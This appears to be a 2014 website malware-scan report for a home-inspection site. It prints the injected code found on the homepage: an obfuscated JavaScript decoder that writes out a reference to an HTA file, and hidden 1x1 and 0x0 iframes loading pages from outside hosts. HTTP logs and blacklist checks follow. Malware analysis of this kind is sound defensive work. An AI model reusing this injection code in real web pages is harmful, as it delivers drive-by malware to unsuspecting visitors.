Scanned pages/files
Request | Server response | Status |
http://homeinspection-handbook.com/ | 200 OK Content-Length: 17969 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var hr=location.href,st='',k='',mdta='%63%67%61%62%62%66%62%62%67%62%63%62%62%61%69%62%61%62%63%67%63%63%64%66%62%63%61%63%66%61%63%65%65%63%64%66%62%63%61%63%66%62%62%63%64%62%62%63%62%62%62%62%62%66%62%61%66%62%62%67%62%61%66%62%62%62%62%62%61%63%66%69%63%6A%68%63%6A%69%62%62%66%62%62%62%62%61%69%62%62%68%62%62%67%62%61%62%63%66%6A%62%61%69%62%61%62%62%61%63%62%62%67%63%66%69%63%65%66%63%65%6A%63%65%69%63%65%69%63%65%69%63%66%6A%62%63%66%63%67%61%63%65%68%62%62%66%62%62%67%62%63%62%62%61%69%62 b0=unescape(mdta); b1=unescape(mdta2); for(i=0;i<b0.length;i++) { s+=b0.slice(i,i+1).charCodeAt(0)-97; }; for(i=0;i<b1.length;i++) { s+=b1.slice(i,i+1).charCodeAt(0)-97; }; for(j=0;j<String(s).length;j+=3) { k=parseInt(String(s).slice(j,j+3)); if(k>200){k-=200;} st+=String.fromCharCode(k); }; document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/corpse.hta')); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://microlib.biz/add.html <iframe src=http://microlib.biz/add.html frameborder="0" width="1" height="1" scrolling="no" name=counter> Hidden iFrame found. size: 0x0 src: http://investment-jobs.com/frame/frame.php <iframe src='http://investment-jobs.com/frame/frame.php' width=0 height=0 border=0 > | ||
http://homeinspection-handbook.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://homeinspection-handbook.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: homeinspection-handbook.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 27 Apr 2014 19:26:16 GMT
Accept-Ranges: bytes
Age: 0
ETag: "4631-40a9bb2724380"
Server: Apache/2
Content-Length: 17969
Content-Type: text/html
Expires: Sun, 27 Apr 2014 20:26:16 GMT
Last-Modified: Wed, 18 Jan 2006 05:55:36 GMT
...17969 bytes of data.
GET / HTTP/1.1
Host: homeinspection-handbook.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 27 Apr 2014 19:26:16 GMT
Accept-Ranges: bytes
Age: 0
ETag: "4631-40a9bb2724380"
Server: Apache/2
Content-Length: 17969
Content-Type: text/html
Expires: Sun, 27 Apr 2014 20:26:16 GMT
Last-Modified: Wed, 18 Jan 2006 05:55:36 GMT
...17969 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: homeinspection-handbook.com
Referer: http://www.google.com/search?q=homeinspection-handbook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: homeinspection-handbook.com
Referer: http://www.google.com/search?q=homeinspection-handbook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homeinspection-handbook.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://homeinspection-handbook.com/
Result: homeinspection-handbook.com is not infected or malware details are not published yet.
Result: homeinspection-handbook.com is not infected or malware details are not published yet.